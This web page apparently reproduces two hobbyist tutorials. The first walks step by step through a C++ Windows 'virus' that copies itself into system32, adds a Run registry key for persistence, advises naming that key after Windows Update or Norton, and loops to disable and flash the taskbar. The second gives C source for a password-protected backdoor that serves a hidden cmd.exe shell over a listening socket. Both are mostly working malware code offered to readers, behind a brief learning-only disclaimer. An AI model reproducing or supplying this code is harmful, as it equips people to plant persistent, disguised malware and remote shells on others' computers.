|
The following are some tutorials that i have found
very useful in my time with computers
Smith Guide to Simple Viruses
Ok first off I’d like to say 2 things:
1.
This guide is only intended for people who want to learn
2. I don’t condone releasing viruses in any way
Taking
the above into consideration I’d like to say welcome to the world of virus programming I’m hoping upon reading
this you well become as fascinated by viruses as I am and continue to study and write new unique viruses.
Most of the
virus writing guides I’ve seen are lengthy, boring and out of date, this guide will try to be the opposite short, fun
and to the point. Now this is what you will need to start programming:
Win32 API Reference <- Not Required but very
helpful
A C++ Compiler – I Recommend DEV for people who do not wish to buy and Microsoft Visual C++ 6.0 for people
with money and serious programmers, however DEV works fine.
Even if you have never programmed before you should be
able to carry along with this one, but it helps if you know a little bit of C++.
Ok lets begin fire up DEV or MSVC
and select new Win32 GUI for DEV users and Win32 for MSVC. Now with DEV it makes some generated code for GUI apps, delete
it all leaving something like this:
| Quote |
#include <windows.h>
int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE
PrevInstance,
LPSTR lpszArgument,
int nFunsterStil)
{
return 0;
}
|
Now compile and run the code nothing should happen (if a black window pops up it means you didn’t
goto win32) The reason nothing happened is because or program doesn’t do anything. It runs and exits we need to make
it do something first of all add this code to the project in between the { } and before return 0;.
MessageBox(NULL,”Hello”,”Messagebox
Example”,MB_OK);
Now compile and run the program again A message box should pop up, cool ay? But its not much
of a virus lets make it do some cool stuff. Add the following code to your project:
| Quote |
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));
strcat(system,”\\virus.exe”);
CopyFile(pathtofile,system,false);
MessageBox(NULL,”Hello”,”Messagebox
Example”,MB_OK);
|
Once again make sure the code is before return 0; and the { }.Ok compile and run the code, now open
up the system32 directory in you windows folder (for those who don’t know goto run in the startbar and type: %windir%\system32
Ok
look for a file called virus.exe in the system32 folder. Don’t believe me that its our virus? Run the file it should
come up with a message box saying “Hello”.
Cool is it not? Ok time to explain how this works:
char
sytem[MAX_PATH]; This is the buffer to hold the system32 directory.
char pathtofile[MAX_PATH]; This is the buffer
to hold the path to our virus.
HMODULE GetModH = GetModuleHandle(NULL); This one my be hard to grasp for some but bare
with me. GetModH holds the handle to our virus GetModuleHandle() gets the handle and stores it there.
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
This gets the FileName of our virus using the handle we got before and storing the path to it in pathtofile.
GetSystemDirectory(system,sizeof(system));
Basically this finds out what your system directory is. Remember not everyone’s window’s directory is c:\windows\system32.
Mine is d:\winnt\system32 on this box, the reason for this is we want to copy to an existent system32 directory.
strcat(system,”\\virus.exe”);
Ok we have the system32 directory c:\windows\system32 or whatever now we need a place to copy to. This function binds to strings
together to form one. So our system buffer now says:
c:\windows\system32\virus.exe or whatever the case maybe. Note \\
is not a typo \\ is how c++ interprets \. A single \ is seen by c++ as an escape character and if you have one your virus
will not work!
CopyFile(pathtofile,system,false); Pretty self explanatory copy from were our virus is to were we want
it to be. What false means if virus.exe already exists it will copy over it, to stop this change false to true (leave it as
false for this tutorial).
Ok that’s it next we are going add code so it will startup when the computer boots.
We are going to use an 3 API calls to accomplish this
RegOpenKeyEx(); This opens the key we want to write to
RegSetValueEx();
This sets our value
RegCloseKey(); This closes the key
Time to add code to our fledgling virus:
| Quote |
HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey
);
RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);
|
Ok obviously this is going to need an more of an explanation than before. HKEY hKey is the buffer that
holds the data for calls to the registry nothing else about this except you need it. RegOpenKeyEx Opens the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
this is the key for starting up for all users which is what we want. 0 is reserved and needs to stay 0. We want to open up
the key with set permissions that’s why we use KEY_SET_VALUE. And then we add the buffer.
The next call: hKey
is the buffer “Writing to the registry example” is the message to appear in the key you can change this to something
less obviously like “Windows Update” or “Norton Security Shield” anyway be creative. The next
zero is the same as above reserved needs to stay 0. REG_SZ is the type of key we want. There are other types like REG_BINARY
and REG_DWORD but we are using REG_SZ which is for text. (const unsigned char*) formats our string to a const unsigned char
* because it doesn’t accept normal chars. system is the buffer that holds the path to our virus and the final part is
the size of the string, this is calculated automatically by using sizeof.
The next call closes the registry key.
Ok
add this to you code so it looks something like:
| Quote |
#include <windows.h>
int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE
PrevInstance,
LPSTR lpszArgument,
int nFunsterStil)
{
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));
strcat(system,”\\virus.exe”);
CopyFile(pathtofile,system,false);
HKEY
hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey
);
RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);
return 0;
}
|
Now run you code and open up regedit and browse to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
there should be a new key in the area to the right our key!
Now comes the fun part of writing a virus the payload!
This could be anywhere from a DdoS to making the cursor jump around the screen. Note destructive payloads are lame and frowned
upon by the virus community, so do you self a favour and get the idea of destroying computers out of your mind. Besides writing
a non destructive payload is more fun. Lets go with a payload I’ve written and christened The Flasher.
Your code
should now look like this with the payload attached:
| Quote |
#include <windows.h>
int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE
PrevInstance,
LPSTR lpszArgument,
int nFunsterStil)
{
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));
strcat(system,”\\virus.exe”);
CopyFile(pathtofile,system,false);
HKEY
hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey
);
RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);
HWND hWin;
hWin = FindWindow("Shell_TrayWnd",NULL);
EnableWindow(hWin,false);
while(1==1)
{
ShowWindow(hWin,false);
Sleep(1000);
ShowWindow(hWin,true);
Sleep(1000);
}
return
0;
}
|
Although small don’t underestimate this payload it is very annoying try it. To fix your startbar
ctrl-alt-delete find virus.exe end the process. Then find explorer.exe end it. Finally while still in task manager goto file
run and type “explorer.exe” without the quotes. If that doesn’t work change EnableWindow and ShowWindow
to true instead of false, remember to change it back later though.
That’s it for now I’ll go in depth about
Finding Windows and such next time. I’ll also teach you how to kill taskmanager. Keep experimenting there are hundreds
of API calls you can use try them out. If you run into an error try and figure out what went wrong 95% of all errors are spelling
mistakes.
Keep Programming,
Smith
This tutorial will describe how to write a very basic backdoor in C, it is not the best backdoor, nor is
it intended to be. It will just show you the basics of writing a program which listens to a specified port and which will
start cmd.exe with input and output redirection to the sockets.
What will we need:
- 2 sockets,
one to listen to a specific port, and the other to establish the connection.
- at least one buffer to read and write data,
but we will use 2 in this tutorial.
- 4 handles to redirect the input / output for cmd.exe
These are the most important
things, although we'll need some other variables / structures as well to make the program work.
The program:
I
will start with the main function, and i will describe the other functions after it.
Main function:
first
we will check to see how much parameters the program has given since we want the program to be able to be used with a self-chosen
port as well as a self-chosen password:
if(argc!=3) //check if we are having enough parameters
{
Usage(argv[0]);//if not, then display usage and exit program.
return EXIT_FAILURE;
}
Next we will check if the portnumber given is really a number and if it is a portnumber useable
for tcp/ip: //check if the portnumber given is really a number
for(i=0;i<strlen(argv[1]);i++)
{
if(isdigit(argv[1][i])==0)
{
printf("Invalid port number.");
return EXIT_FAILURE;
}
}
port=atoi(argv[1]); //make integer from ascii string
//final check to see if it is a real port number
if(port>65535||port<1)
{
printf("Invalid port number.");
return EXIT_FAILURE;
}
Make everything ready and start listening to the port given:
//tell windows we want to use sockets
WSAStartup(0x101,&wsadata);//we will use version 1.1 here
//create socket
locsock=socket(AF_INET,SOCK_STREAM,0);
//fill structure
sinloc.sin_family=AF_INET;
sinloc.sin_addr.s_addr=INADDR_ANY;
sinloc.sin_port=htons(port);
//bind the socket to the specified port
if(bind(locsock,(SOCKADDR*)&sinloc,sizeof(SOCKADDR_IN))==SOCKET_ERROR)
{
WSACleanup();
printf("Error binding socket.");
return EXIT_FAILURE;
}
//listen on the specified socket
if(listen(locsock,5)==SOCKET_ERROR)
{
WSACleanup();
printf("Error listening socket.");
return EXIT_FAILURE;
}
Here we will have the infinite loop to accept connections and check the password. If password given
is correct then we will start the CommandPrompt() function, if not, then we will close connection and start listening again.
//infinite loop here to keep the program listening
while(1)
{
remsock=SOCKET_ERROR;
while(remsock==SOCKET_ERROR)
{
//accept connection to our program
remsock=accept(locsock,NULL,NULL);
if(remsock==INVALID_SOCKET)
{
//cleanup and exit program
WSACleanup();
printf("Error accepting socket.");
return EXIT_FAILURE;
}
}
//ask for password
send(remsock,welcome,sizeof(welcome),0);
recv(remsock,bufferin,sizeof(bufferin),0);
//check password given
bufferin[strlen(bufferin)-1]=0; //we need this to strip off last character
if(strcmp(bufferin,argv[2])!=0)
{
send(remsock,"\nAccess Denied.\n",17,0);
}
else
{
CommandPrompt(); //start the commandprompt function
}
closesocket(remsock); //close the socket
}
Usage Function:
This function displays the usage of the program and then exits the
program:
void Usage(char AppName[]) //the function which does nothing more then print out the usage
{
printf("backdoor, written by White Scorpion Security (C) 2005\n");
printf(" **** http://www.white-scorpion.nl ****\n\n");
printf("Usage: %s < port > < password >\n",AppName);
}
CommandPrompt Function:
This function actually does most of the work, it starts
the command prompt, redirect its output and send and receive the data to the socket / command prompt.
first we define
the variables used in this function, the 2 exits are used to intercept the command 'exit', since otherwise our program would
hang if we don't.
secat.nLength=sizeof(SECURITY_ATTRIBUTES);
secat.bInheritHandle=TRUE;
DWORD bytesW; //number of bytes written gets stored here
HANDLE newstdin,newstdout,readout,writein; //the handles for our Pipes
char exit1[]={'e','x','i','t',10,0}; //we need this to compare our command to 'exit'
char exit2[]={'E','X','I','T',10,0}; //we need this to compare our command to 'EXIT'
Then we create the pipes used to redirect cmd.exe 's input and output, get the startup info and
fill its structure:
//create the pipes for our command prompt
CreatePipe(&newstdin,&writein,&secat,0);
CreatePipe(&readout,&newstdout,&secat,0);
GetStartupInfo(&startinfo);
//fill another structure
startinfo.dwFlags=STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
startinfo.wShowWindow=SW_HIDE;
startinfo.hStdOutput=newstdout;
startinfo.hStdError=newstdout;
startinfo.hStdInput=newstdin;
Now we will create the process cmd.exe:
//start cmd prompt
CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,CREATE_NEW_CONSOLE,NULL,NULL,&startinfo,&procinfo);
//I didn't use any error checks here, but you should do it to prevent strange behaviour.
Finally we have the endless loop which receives the output from cmd.exe and sends it to the
socket, the data received from the socket is written to cmd.exe to execute the command given.
while(1)
{
//check if cmd.exe is still running, if not then cleanup and start listening again.
if(GetExitCodeProcess(procinfo.hProcess,&exitcode)==STILL_ACTIVE)
{
CloseHandle(procinfo.hThread);
CloseHandle(procinfo.hProcess);
CloseHandle(newstdin);
CloseHandle(writein);
CloseHandle(readout);
CloseHandle(newstdout);
break;
}
bytesRead=0;
//sleep 0.5 seconds to give cmd.exe the chance to startup
sleep(500);
//check if the pipe already contains something we can write to output
PeekNamedPipe(readout,bufferout,sizeof(bufferout),&bytesRead,&avail,NULL);
if(bytesRead!=0)
{
while(bytesRead!=0)
{ //read data from cmd.exe and send to client, then clear the buffer
ReadFile(readout,bufferout,sizeof(bufferout),&bytesRead,NULL);
send(remsock,bufferout,strlen(bufferout),0);
ZeroMemory(bufferout,sizeof(bufferout));
sleep(100);
PeekNamedPipe(readout,bufferout,sizeof(bufferout),&bytesRead,&avail,NULL);
}
}
//clear bufferin
ZeroMemory(bufferin,sizeof(bufferin));
//receive the command given
recv(remsock,bufferin,sizeof(bufferin),0);
//if command is 'exit' or 'EXIT' then we have to capture it to prevent our program
//from hanging.
if((strcmp(bufferin,exit1)==0)||(strcmp(bufferin,exit2)==0))
{
//let cmd.exe close by giving the command, then go to closeup label
WriteFile(writein,bufferin,strlen(bufferin),&bytesW,NULL);
goto closeup;
}
//else write the command to cmd.exe
WriteFile(writein,bufferin,strlen(bufferin),&bytesW,NULL);
//clear the bufferin
for(i=0;i<sizeof(bufferin);i++)
{
bufferin[i]=0;
}
}
And we cleanup everything and return to main, which will then start listening again.
//close up all handles
closeup:
CloseHandle(procinfo.hThread);
CloseHandle(procinfo.hProcess);
CloseHandle(newstdin);
CloseHandle(writein);
CloseHandle(readout);
CloseHandle(newstdout);
This is all, 3 functions, and some code and you can write your own backdoor. the complete sourcecode
and final program from this tutorial can be downloaded from here.
|
